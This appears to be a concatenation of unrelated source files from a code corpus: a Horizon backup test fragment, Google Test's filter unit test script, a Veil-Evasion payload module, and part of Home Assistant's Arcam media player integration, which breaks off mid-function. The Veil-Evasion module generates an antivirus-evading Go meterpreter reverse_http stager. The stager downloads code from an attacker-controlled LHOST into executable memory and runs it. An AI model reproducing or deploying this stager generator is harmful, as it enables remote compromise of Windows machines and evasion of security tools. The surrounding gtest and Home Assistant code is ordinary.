    def test_detail_backup_notfound(self):
        # A missing backup redirects back to the index page.
        api.trove.backup_get(IsA(http.HttpRequest), IsA(unicode))\
            .AndRaise(self.exceptions.trove)

        self.mox.ReplayAll()
        res = self.client.get(DETAILS_URL)

        self.assertRedirectsNoFollow(res, INDEX_URL)

    @test.create_stubs({api.trove: ('backup_get', 'instance_get')})
    def test_detail_backup_incr(self):
        # Detail view of an incremental backup also fetches its parent.
        incr_backup = self.database_backups.list()[2]
        parent_backup = self.database_backups.list()[1]

        api.trove.backup_get(IsA(http.HttpRequest), IsA(unicode))\
            .AndReturn(incr_backup)
        api.trove.backup_get(IsA(http.HttpRequest), incr_backup.parent_id) \
            .AndReturn(parent_backup)
        api.trove.instance_get(IsA(http.HttpRequest), IsA(str))\
            .AndReturn(self.databases.list()[1])

        self.mox.ReplayAll()
        url = reverse('horizon:project:database_backups:detail',
                      args=[incr_backup.id])
        res = self.client.get(url)

        self.assertTemplateUsed(res, 'project/database_backups/details.html')
apache-2.0
yaoandw/joke
Pods/AVOSCloudCrashReporting/Breakpad/src/third_party/protobuf/protobuf/gtest/test/gtest_filter_unittest.py
2826
21261
#!/usr/bin/env python
#
# Copyright 2005 Google Inc. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
#     * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#     * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

"""Unit test for Google Test test filters.

A user can specify which test(s) in a Google Test program to run via either
the GTEST_FILTER environment variable or the --gtest_filter flag.
This script tests such functionality by invoking
gtest_filter_unittest_ (a program written with Google Test) with different
environments and command line flags.

Note that test sharding may also influence which tests are filtered. Therefore,
we test that here also.
"""

__author__ = 'wan@google.com (Zhanyong Wan)'

# NOTE(review): Python 2 only — the deprecated ``sets`` module and
# print-statement syntax inside the -c probe strings below.
import os
import re
import sets
import sys

import gtest_test_utils

# Constants.

# Checks if this platform can pass empty environment variables to child
# processes.  We set an env variable to an empty string and invoke a python
# script in a subprocess to print whether the variable is STILL in
# os.environ.  We then use 'eval' to parse the child's output so that an
# exception is thrown if the input is anything other than 'True' nor 'False'.
# (eval here only ever sees our own probe's 'True'/'False' output.)
os.environ['EMPTY_VAR'] = ''
child = gtest_test_utils.Subprocess(
    [sys.executable, '-c', 'import os; print \'EMPTY_VAR\' in os.environ'])
CAN_PASS_EMPTY_ENV = eval(child.output)

# Check if this platform can unset environment variables in child processes.
# We set an env variable to a non-empty string, unset it, and invoke
# a python script in a subprocess to print whether the variable
# is NO LONGER in os.environ.
# We use 'eval' to parse the child's output so that an exception
# is thrown if the input is neither 'True' nor 'False'.
os.environ['UNSET_VAR'] = 'X'
del os.environ['UNSET_VAR']
child = gtest_test_utils.Subprocess(
    [sys.executable, '-c', 'import os; print \'UNSET_VAR\' not in os.environ'])
CAN_UNSET_ENV = eval(child.output)

# Checks if we should test with an empty filter. This doesn't
# make sense on platforms that cannot pass empty env variables (Win32)
# and on platforms that cannot unset variables (since we cannot tell
# the difference between "" and NULL -- Borland and Solaris < 5.10)
CAN_TEST_EMPTY_FILTER = (CAN_PASS_EMPTY_ENV and CAN_UNSET_ENV)

# The environment variable for specifying the test filters.
FILTER_ENV_VAR = 'GTEST_FILTER'

# The environment variables for test sharding.
TOTAL_SHARDS_ENV_VAR = 'GTEST_TOTAL_SHARDS'
SHARD_INDEX_ENV_VAR = 'GTEST_SHARD_INDEX'
SHARD_STATUS_FILE_ENV_VAR = 'GTEST_SHARD_STATUS_FILE'

# The command line flag for specifying the test filters.
FILTER_FLAG = 'gtest_filter'

# The command line flag for including disabled tests.
# (The "DISABED" spelling is preserved as-is; it is only a local constant
# name and must stay in sync with nothing external.)
ALSO_RUN_DISABED_TESTS_FLAG = 'gtest_also_run_disabled_tests'

# Command to run the gtest_filter_unittest_ program.
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_filter_unittest_')

# Regex for determining whether parameterized tests are enabled in the binary.
PARAM_TEST_REGEX = re.compile(r'/ParamTest')

# Regex for parsing test case names from Google Test's output.
TEST_CASE_REGEX = re.compile(r'^\[\-+\] \d+ tests? from (\w+(/\w+)?)')

# Regex for parsing test names from Google Test's output.
TEST_REGEX = re.compile(r'^\[\s*RUN\s*\].*\.(\w+(/\w+)?)')

# The command line flag to tell Google Test to output the list of tests it
# will run.
LIST_TESTS_FLAG = '--gtest_list_tests'

# Indicates whether Google Test supports death tests.
SUPPORTS_DEATH_TESTS = 'HasDeathTest' in gtest_test_utils.Subprocess(
    [COMMAND, LIST_TESTS_FLAG]).output

# Full names of all tests in gtest_filter_unittests_.
PARAM_TESTS = [
    'SeqP/ParamTest.TestX/0',
    'SeqP/ParamTest.TestX/1',
    'SeqP/ParamTest.TestY/0',
    'SeqP/ParamTest.TestY/1',
    'SeqQ/ParamTest.TestX/0',
    'SeqQ/ParamTest.TestX/1',
    'SeqQ/ParamTest.TestY/0',
    'SeqQ/ParamTest.TestY/1',
    ]

DISABLED_TESTS = [
    'BarTest.DISABLED_TestFour',
    'BarTest.DISABLED_TestFive',
    'BazTest.DISABLED_TestC',
    'DISABLED_FoobarTest.Test1',
    'DISABLED_FoobarTest.DISABLED_Test2',
    'DISABLED_FoobarbazTest.TestA',
    ]

if SUPPORTS_DEATH_TESTS:
  DEATH_TESTS = [
    'HasDeathTest.Test1',
    'HasDeathTest.Test2',
    ]
else:
  DEATH_TESTS = []

# All the non-disabled tests.
ACTIVE_TESTS = [
    'FooTest.Abc',
    'FooTest.Xyz',

    'BarTest.TestOne',
    'BarTest.TestTwo',
    'BarTest.TestThree',

    'BazTest.TestOne',
    'BazTest.TestA',
    'BazTest.TestB',
    ] + DEATH_TESTS + PARAM_TESTS

# Filled in lazily once the binary has been queried for parameterized tests.
param_tests_present = None

# Utilities.
environ = os.environ.copy() def SetEnvVar(env_var, value): """Sets the env variable to 'value'; unsets it when 'value' is None.""" if value is not None: environ[env_var] = value elif env_var in environ: del environ[env_var] def RunAndReturnOutput(args = None): """Runs the test program and returns its output.""" return gtest_test_utils.Subprocess([COMMAND] + (args or []), env=environ).output def RunAndExtractTestList(args = None): """Runs the test program and returns its exit code and a list of tests run.""" p = gtest_test_utils.Subprocess([COMMAND] + (args or []), env=environ) tests_run = [] test_case = '' test = '' for line in p.output.split('\n'): match = TEST_CASE_REGEX.match(line) if match is not None: test_case = match.group(1) else: match = TEST_REGEX.match(line) if match is not None: test = match.group(1) tests_run.append(test_case + '.' + test) return (tests_run, p.exit_code) def InvokeWithModifiedEnv(extra_env, function, *args, **kwargs): """Runs the given function and arguments in a modified environment.""" try: original_env = environ.copy() environ.update(extra_env) return function(*args, **kwargs) finally: environ.clear() environ.update(original_env) def RunWithSharding(total_shards, shard_index, command): """Runs a test program shard and returns exit code and a list of tests run.""" extra_env = {SHARD_INDEX_ENV_VAR: str(shard_index), TOTAL_SHARDS_ENV_VAR: str(total_shards)} return InvokeWithModifiedEnv(extra_env, RunAndExtractTestList, command) # The unit test. class GTestFilterUnitTest(gtest_test_utils.TestCase): """Tests the env variable or the command line flag to filter tests.""" # Utilities. 
def AssertSetEqual(self, lhs, rhs): """Asserts that two sets are equal.""" for elem in lhs: self.assert_(elem in rhs, '%s in %s' % (elem, rhs)) for elem in rhs: self.assert_(elem in lhs, '%s in %s' % (elem, lhs)) def AssertPartitionIsValid(self, set_var, list_of_sets): """Asserts that list_of_sets is a valid partition of set_var.""" full_partition = [] for slice_var in list_of_sets: full_partition.extend(slice_var) self.assertEqual(len(set_var), len(full_partition)) self.assertEqual(sets.Set(set_var), sets.Set(full_partition)) def AdjustForParameterizedTests(self, tests_to_run): """Adjust tests_to_run in case value parameterized tests are disabled.""" global param_tests_present if not param_tests_present: return list(sets.Set(tests_to_run) - sets.Set(PARAM_TESTS)) else: return tests_to_run def RunAndVerify(self, gtest_filter, tests_to_run): """Checks that the binary runs correct set of tests for a given filter.""" tests_to_run = self.AdjustForParameterizedTests(tests_to_run) # First, tests using the environment variable. # Windows removes empty variables from the environment when passing it # to a new process. This means it is impossible to pass an empty filter # into a process using the environment variable. However, we can still # test the case when the variable is not supplied (i.e., gtest_filter is # None). # pylint: disable-msg=C6403 if CAN_TEST_EMPTY_FILTER or gtest_filter != '': SetEnvVar(FILTER_ENV_VAR, gtest_filter) tests_run = RunAndExtractTestList()[0] SetEnvVar(FILTER_ENV_VAR, None) self.AssertSetEqual(tests_run, tests_to_run) # pylint: enable-msg=C6403 # Next, tests using the command line flag. if gtest_filter is None: args = [] else: args = ['--%s=%s' % (FILTER_FLAG, gtest_filter)] tests_run = RunAndExtractTestList(args)[0] self.AssertSetEqual(tests_run, tests_to_run) def RunAndVerifyWithSharding(self, gtest_filter, total_shards, tests_to_run, args=None, check_exit_0=False): """Checks that binary runs correct tests for the given filter and shard. 
Runs all shards of gtest_filter_unittest_ with the given filter, and verifies that the right set of tests were run. The union of tests run on each shard should be identical to tests_to_run, without duplicates. Args: gtest_filter: A filter to apply to the tests. total_shards: A total number of shards to split test run into. tests_to_run: A set of tests expected to run. args : Arguments to pass to the to the test binary. check_exit_0: When set to a true value, make sure that all shards return 0. """ tests_to_run = self.AdjustForParameterizedTests(tests_to_run) # Windows removes empty variables from the environment when passing it # to a new process. This means it is impossible to pass an empty filter # into a process using the environment variable. However, we can still # test the case when the variable is not supplied (i.e., gtest_filter is # None). # pylint: disable-msg=C6403 if CAN_TEST_EMPTY_FILTER or gtest_filter != '': SetEnvVar(FILTER_ENV_VAR, gtest_filter) partition = [] for i in range(0, total_shards): (tests_run, exit_code) = RunWithSharding(total_shards, i, args) if check_exit_0: self.assertEqual(0, exit_code) partition.append(tests_run) self.AssertPartitionIsValid(tests_to_run, partition) SetEnvVar(FILTER_ENV_VAR, None) # pylint: enable-msg=C6403 def RunAndVerifyAllowingDisabled(self, gtest_filter, tests_to_run): """Checks that the binary runs correct set of tests for the given filter. Runs gtest_filter_unittest_ with the given filter, and enables disabled tests. Verifies that the right set of tests were run. Args: gtest_filter: A filter to apply to the tests. tests_to_run: A set of tests expected to run. """ tests_to_run = self.AdjustForParameterizedTests(tests_to_run) # Construct the command line. args = ['--%s' % ALSO_RUN_DISABED_TESTS_FLAG] if gtest_filter is not None: args.append('--%s=%s' % (FILTER_FLAG, gtest_filter)) tests_run = RunAndExtractTestList(args)[0] self.AssertSetEqual(tests_run, tests_to_run) def setUp(self): """Sets up test case. 
Determines whether value-parameterized tests are enabled in the binary and sets the flags accordingly. """ global param_tests_present if param_tests_present is None: param_tests_present = PARAM_TEST_REGEX.search( RunAndReturnOutput()) is not None def testDefaultBehavior(self): """Tests the behavior of not specifying the filter.""" self.RunAndVerify(None, ACTIVE_TESTS) def testDefaultBehaviorWithShards(self): """Tests the behavior without the filter, with sharding enabled.""" self.RunAndVerifyWithSharding(None, 1, ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, 2, ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) - 1, ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS), ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) + 1, ACTIVE_TESTS) def testEmptyFilter(self): """Tests an empty filter.""" self.RunAndVerify('', []) self.RunAndVerifyWithSharding('', 1, []) self.RunAndVerifyWithSharding('', 2, []) def testBadFilter(self): """Tests a filter that matches nothing.""" self.RunAndVerify('BadFilter', []) self.RunAndVerifyAllowingDisabled('BadFilter', []) def testFullName(self): """Tests filtering by full name.""" self.RunAndVerify('FooTest.Xyz', ['FooTest.Xyz']) self.RunAndVerifyAllowingDisabled('FooTest.Xyz', ['FooTest.Xyz']) self.RunAndVerifyWithSharding('FooTest.Xyz', 5, ['FooTest.Xyz']) def testUniversalFilters(self): """Tests filters that match everything.""" self.RunAndVerify('*', ACTIVE_TESTS) self.RunAndVerify('*.*', ACTIVE_TESTS) self.RunAndVerifyWithSharding('*.*', len(ACTIVE_TESTS) - 3, ACTIVE_TESTS) self.RunAndVerifyAllowingDisabled('*', ACTIVE_TESTS + DISABLED_TESTS) self.RunAndVerifyAllowingDisabled('*.*', ACTIVE_TESTS + DISABLED_TESTS) def testFilterByTestCase(self): """Tests filtering by test case name.""" self.RunAndVerify('FooTest.*', ['FooTest.Abc', 'FooTest.Xyz']) BAZ_TESTS = ['BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB'] self.RunAndVerify('BazTest.*', BAZ_TESTS) 
self.RunAndVerifyAllowingDisabled('BazTest.*', BAZ_TESTS + ['BazTest.DISABLED_TestC']) def testFilterByTest(self): """Tests filtering by test name.""" self.RunAndVerify('*.TestOne', ['BarTest.TestOne', 'BazTest.TestOne']) def testFilterDisabledTests(self): """Select only the disabled tests to run.""" self.RunAndVerify('DISABLED_FoobarTest.Test1', []) self.RunAndVerifyAllowingDisabled('DISABLED_FoobarTest.Test1', ['DISABLED_FoobarTest.Test1']) self.RunAndVerify('*DISABLED_*', []) self.RunAndVerifyAllowingDisabled('*DISABLED_*', DISABLED_TESTS) self.RunAndVerify('*.DISABLED_*', []) self.RunAndVerifyAllowingDisabled('*.DISABLED_*', [ 'BarTest.DISABLED_TestFour', 'BarTest.DISABLED_TestFive', 'BazTest.DISABLED_TestC', 'DISABLED_FoobarTest.DISABLED_Test2', ]) self.RunAndVerify('DISABLED_*', []) self.RunAndVerifyAllowingDisabled('DISABLED_*', [ 'DISABLED_FoobarTest.Test1', 'DISABLED_FoobarTest.DISABLED_Test2', 'DISABLED_FoobarbazTest.TestA', ]) def testWildcardInTestCaseName(self): """Tests using wildcard in the test case name.""" self.RunAndVerify('*a*.*', [ 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', 'BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS) def testWildcardInTestName(self): """Tests using wildcard in the test name.""" self.RunAndVerify('*.*A*', ['FooTest.Abc', 'BazTest.TestA']) def testFilterWithoutDot(self): """Tests a filter that has no '.' 
in it.""" self.RunAndVerify('*z*', [ 'FooTest.Xyz', 'BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB', ]) def testTwoPatterns(self): """Tests filters that consist of two patterns.""" self.RunAndVerify('Foo*.*:*A*', [ 'FooTest.Abc', 'FooTest.Xyz', 'BazTest.TestA', ]) # An empty pattern + a non-empty one self.RunAndVerify(':*A*', ['FooTest.Abc', 'BazTest.TestA']) def testThreePatterns(self): """Tests filters that consist of three patterns.""" self.RunAndVerify('*oo*:*A*:*One', [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BazTest.TestOne', 'BazTest.TestA', ]) # The 2nd pattern is empty. self.RunAndVerify('*oo*::*One', [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BazTest.TestOne', ]) # The last 2 patterns are empty. self.RunAndVerify('*oo*::', [ 'FooTest.Abc', 'FooTest.Xyz', ]) def testNegativeFilters(self): self.RunAndVerify('*-BazTest.TestOne', [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', 'BazTest.TestA', 'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS) self.RunAndVerify('*-FooTest.Abc:BazTest.*', [ 'FooTest.Xyz', 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', ] + DEATH_TESTS + PARAM_TESTS) self.RunAndVerify('BarTest.*-BarTest.TestOne', [ 'BarTest.TestTwo', 'BarTest.TestThree', ]) # Tests without leading '*'. self.RunAndVerify('-FooTest.Abc:FooTest.Xyz:BazTest.*', [ 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', ] + DEATH_TESTS + PARAM_TESTS) # Value parameterized tests. self.RunAndVerify('*/*', PARAM_TESTS) # Value parameterized tests filtering by the sequence name. self.RunAndVerify('SeqP/*', [ 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestX/1', 'SeqP/ParamTest.TestY/0', 'SeqP/ParamTest.TestY/1', ]) # Value parameterized tests filtering by the test name. self.RunAndVerify('*/0', [ 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestY/0', 'SeqQ/ParamTest.TestX/0', 'SeqQ/ParamTest.TestY/0', ]) def testFlagOverridesEnvVar(self): """Tests that the filter flag overrides the filtering env. 
variable.""" SetEnvVar(FILTER_ENV_VAR, 'Foo*') args = ['--%s=%s' % (FILTER_FLAG, '*One')] tests_run = RunAndExtractTestList(args)[0] SetEnvVar(FILTER_ENV_VAR, None) self.AssertSetEqual(tests_run, ['BarTest.TestOne', 'BazTest.TestOne']) def testShardStatusFileIsCreated(self): """Tests that the shard file is created if specified in the environment.""" shard_status_file = os.path.join(gtest_test_utils.GetTempDir(), 'shard_status_file') self.assert_(not os.path.exists(shard_status_file)) extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file} try: InvokeWithModifiedEnv(extra_env, RunAndReturnOutput) finally: self.assert_(os.path.exists(shard_status_file)) os.remove(shard_status_file) def testShardStatusFileIsCreatedWithListTests(self): """Tests that the shard file is created with the "list_tests" flag.""" shard_status_file = os.path.join(gtest_test_utils.GetTempDir(), 'shard_status_file2') self.assert_(not os.path.exists(shard_status_file)) extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file} try: output = InvokeWithModifiedEnv(extra_env, RunAndReturnOutput, [LIST_TESTS_FLAG]) finally: # This assertion ensures that Google Test enumerated the tests as # opposed to running them. 
self.assert_('[==========]' not in output, 'Unexpected output during test enumeration.\n' 'Please ensure that LIST_TESTS_FLAG is assigned the\n' 'correct flag value for listing Google Test tests.') self.assert_(os.path.exists(shard_status_file)) os.remove(shard_status_file) if SUPPORTS_DEATH_TESTS: def testShardingWorksWithDeathTests(self): """Tests integration with death tests and sharding.""" gtest_filter = 'HasDeathTest.*:SeqP/*' expected_tests = [ 'HasDeathTest.Test1', 'HasDeathTest.Test2', 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestX/1', 'SeqP/ParamTest.TestY/0', 'SeqP/ParamTest.TestY/1', ] for flag in ['--gtest_death_test_style=threadsafe', '--gtest_death_test_style=fast']: self.RunAndVerifyWithSharding(gtest_filter, 3, expected_tests, check_exit_0=True, args=[flag]) self.RunAndVerifyWithSharding(gtest_filter, 5, expected_tests, check_exit_0=True, args=[flag]) if __name__ == '__main__': gtest_test_utils.Main()
mit
masterdon/Veil-Evasion
modules/payloads/go/meterpreter/rev_http.py
8
4977
""" Custom-written pure go meterpreter/reverse_http stager. Module built by @b00stfr3ak44 """ from modules.common import helpers from random import randint class Payload: def __init__(self): # required options self.description = "pure windows/meterpreter/reverse_http stager, no shellcode" self.language = "Go" self.extension = "go" self.rating = "Normal" # options we require user ineraction for- format is {Option : [Value, Description]]} self.required_options = { "LHOST" : ["", "IP of the Metasploit handler"], "LPORT" : ["80", "Port of the Metasploit handler"], "COMPILE_TO_EXE" : ["Y", "Compile to an executable"] } def generate(self): memCommit = helpers.randomString() memReserve = helpers.randomString() pageExecRW = helpers.randomString() kernel32 = helpers.randomString() procVirtualAlloc = helpers.randomString() base64Url = helpers.randomString() virtualAlloc = helpers.randomString() size = helpers.randomString() addr = helpers.randomString() err = helpers.randomString() randBase = helpers.randomString() length = helpers.randomString() foo = helpers.randomString() random = helpers.randomString() outp = helpers.randomString() i = helpers.randomString() randTextBase64URL= helpers.randomString() getURI = helpers.randomString() sumVar = helpers.randomString() checksum8 = helpers.randomString() uri = helpers.randomString() value = helpers.randomString() hostAndPort = helpers.randomString() port = self.required_options["LPORT"][0] host = self.required_options["LHOST"][0] response = helpers.randomString() uriLength = randint(5, 255) payload = helpers.randomString() bufferVar = helpers.randomString() x = helpers.randomString() payloadCode = "package main\nimport (\n\"syscall\"\n\"unsafe\"\n" payloadCode += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n)\n" payloadCode += "const (\n" payloadCode += "%s = 0x1000\n" %(memCommit) payloadCode += "%s = 0x2000\n" %(memReserve) payloadCode += "%s = 0x40\n)\n" %(pageExecRW) payloadCode += "var (\n" payloadCode += "%s = 
syscall.NewLazyDLL(\"kernel32.dll\")\n" %(kernel32) payloadCode += "%s = %s.NewProc(\"VirtualAlloc\")\n" %(procVirtualAlloc, kernel32) payloadCode += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n)\n" %(base64Url) payloadCode += "func %s(%s uintptr) (uintptr, error) {\n" %(virtualAlloc, size) payloadCode += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" %(addr, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW) payloadCode += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" %(addr, err, addr) payloadCode += "func %s(%s int, %s []byte) string {\n" %(randBase, length, foo) payloadCode += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" %(random) payloadCode += "var %s []byte\n" %(outp) payloadCode += "for %s := 0; %s < %s; %s++ {\n" %(i, i, length, i) payloadCode += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" %(outp, outp, foo, random, foo) payloadCode += "return string(%s)\n}\n" %(outp) payloadCode += "func %s(%s int) string {\n" %(randTextBase64URL, length) payloadCode += "%s := []byte(%s)\n" %(foo, base64Url) payloadCode += "return %s(%s, %s)\n}\n" %(randBase, length, foo) payloadCode += "func %s(%s, %s int) string {\n" %(getURI, sumVar, length) payloadCode += "for {\n%s := 0\n%s := %s(%s)\n" %(checksum8, uri, randTextBase64URL, length) payloadCode += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" %(value, uri, checksum8, value) payloadCode += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" %(checksum8, '%0x100', sumVar, uri) payloadCode += "func main() {\n" payloadCode += "%s := \"http://%s:%s\"\n" %(hostAndPort, host, port) payloadCode += "%s, _ := http.Get(%s + %s(92, %s))\n" %(response, hostAndPort, getURI, uriLength) payloadCode += "defer %s.Body.Close()\n" %(response) payloadCode += "%s, _ := ioutil.ReadAll(%s.Body)\n" %(payload, response) payloadCode += "%s, _ := %s(uintptr(len(%s)))\n" %(addr, virtualAlloc, payload) payloadCode += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr) 
payloadCode += "for %s, %s := range %s {\n" %(x, value, payload) payloadCode += "%s[%s] = %s\n}\n" %(bufferVar, x, value) payloadCode += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" %(addr) return payloadCode
gpl-3.0
home-assistant/home-assistant
homeassistant/components/arcam_fmj/media_player.py
2
11804
"""Arcam media player.""" import logging from arcam.fmj import DecodeMode2CH, DecodeModeMCH, IncomingAudioFormat, SourceCodes from arcam.fmj.state import State from homeassistant import config_entries from homeassistant.components.media_player import BrowseMedia, MediaPlayerEntity from homeassistant.components.media_player.const import ( MEDIA_CLASS_DIRECTORY, MEDIA_CLASS_MUSIC, MEDIA_TYPE_MUSIC, SUPPORT_BROWSE_MEDIA, SUPPORT_PLAY_MEDIA, SUPPORT_SELECT_SOUND_MODE, SUPPORT_SELECT_SOURCE, SUPPORT_TURN_OFF, SUPPORT_TURN_ON, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET, SUPPORT_VOLUME_STEP, ) from homeassistant.components.media_player.errors import BrowseError from homeassistant.const import ATTR_ENTITY_ID, STATE_OFF, STATE_ON from homeassistant.core import HomeAssistant, callback from .config_flow import get_entry_client from .const import ( DOMAIN, EVENT_TURN_ON, SIGNAL_CLIENT_DATA, SIGNAL_CLIENT_STARTED, SIGNAL_CLIENT_STOPPED, ) _LOGGER = logging.getLogger(__name__) async def async_setup_entry( hass: HomeAssistant, config_entry: config_entries.ConfigEntry, async_add_entities, ): """Set up the configuration entry.""" client = get_entry_client(hass, config_entry) async_add_entities( [ ArcamFmj( config_entry.title, State(client, zone), config_entry.unique_id or config_entry.entry_id, ) for zone in [1, 2] ], True, ) return True class ArcamFmj(MediaPlayerEntity): """Representation of a media device.""" def __init__( self, device_name, state: State, uuid: str, ): """Initialize device.""" self._state = state self._device_name = device_name self._name = f"{device_name} - Zone: {state.zn}" self._uuid = uuid self._support = ( SUPPORT_SELECT_SOURCE | SUPPORT_PLAY_MEDIA | SUPPORT_BROWSE_MEDIA | SUPPORT_VOLUME_SET | SUPPORT_VOLUME_MUTE | SUPPORT_VOLUME_STEP | SUPPORT_TURN_OFF | SUPPORT_TURN_ON ) if state.zn == 1: self._support |= SUPPORT_SELECT_SOUND_MODE def _get_2ch(self): """Return if source is 2 channel or not.""" audio_format, _ = self._state.get_incoming_audio_format() return 
bool( audio_format in ( IncomingAudioFormat.PCM, IncomingAudioFormat.ANALOGUE_DIRECT, IncomingAudioFormat.UNDETECTED, None, ) ) @property def entity_registry_enabled_default(self) -> bool: """Return if the entity should be enabled when first added to the entity registry.""" return self._state.zn == 1 @property def unique_id(self): """Return unique identifier if known.""" return f"{self._uuid}-{self._state.zn}" @property def device_info(self): """Return a device description for device registry.""" return { "name": self._device_name, "identifiers": { (DOMAIN, self._uuid), (DOMAIN, self._state.client.host, self._state.client.port), }, "model": "Arcam FMJ AVR", "manufacturer": "Arcam", } @property def should_poll(self) -> bool: """No need to poll.""" return False @property def name(self): """Return the name of the controlled device.""" return self._name @property def state(self): """Return the state of the device.""" if self._state.get_power(): return STATE_ON return STATE_OFF @property def supported_features(self): """Flag media player features that are supported.""" return self._support async def async_added_to_hass(self): """Once registered, add listener for events.""" await self._state.start() @callback def _data(host): if host == self._state.client.host: self.async_write_ha_state() @callback def _started(host): if host == self._state.client.host: self.async_schedule_update_ha_state(force_refresh=True) @callback def _stopped(host): if host == self._state.client.host: self.async_schedule_update_ha_state(force_refresh=True) self.async_on_remove( self.hass.helpers.dispatcher.async_dispatcher_connect( SIGNAL_CLIENT_DATA, _data ) ) self.async_on_remove( self.hass.helpers.dispatcher.async_dispatcher_connect( SIGNAL_CLIENT_STARTED, _started ) ) self.async_on_remove( self.hass.helpers.dispatcher.async_dispatcher_connect( SIGNAL_CLIENT_STOPPED, _stopped ) ) async def async_update(self): """Force update of state.""" _LOGGER.debug("Update state %s", self.name) await 
self._state.update() async def async_mute_volume(self, mute): """Send mute command.""" await self._state.set_mute(mute) self.async_write_ha_state() async def async_select_source(self, source): """Select a specific source.""" try: value = SourceCodes[source] except KeyError: _LOGGER.error("Unsupported source %s", source) return await self._state.set_source(value) self.async_write_ha_state() async def async_select_sound_mode(self, sound_mode): """Select a specific source.""" try: if self._get_2ch(): await self._state.set_decode_mode_2ch(DecodeMode2CH[sound_mode]) else: await self._state.set_decode_mode_mch(DecodeModeMCH[sound_mode]) except KeyError: _LOGGER.error("Unsupported sound_mode %s", sound_mode) return self.async_write_ha_state() async def async_set_volume_level(self, volume): """Set volume level, range 0..1.""" await self._state.set_volume(round(volume * 99.0)) self.async_write_ha_state() async def async_volume_up(self): """Turn volume up for media player.""" await self._state.inc_volume() self.async_write_ha_state() async def async_volume_down(self): """Turn volume up for media player.""" await self._state.dec_volume() self.async_write_ha_state() async def async_turn_on(self): """Turn the media player on.""" if self._state.get_power() is not None: _LOGGER.debug("Turning on device using connection") await self._state.set_power(True) else: _LOGGER.debug("Firing event to turn on device") self.hass.bus.async_fire(EVENT_TURN_ON, {ATTR_ENTITY_ID: self.entity_id}) async def async_turn_off(self): """Turn the media player off.""" await self._state.set_power(False) async def async_browse_media(self, media_content_type=None, media_content_id=None): """Implement the websocket media browsing helper.""" if media_content_id not in (None, "root"): raise BrowseError( f"Media not found: {media_content_type} / {media_content_id}" ) presets = self._state.get_preset_details() radio = [ BrowseMedia( title=preset.name, media_class=MEDIA_CLASS_MUSIC, 
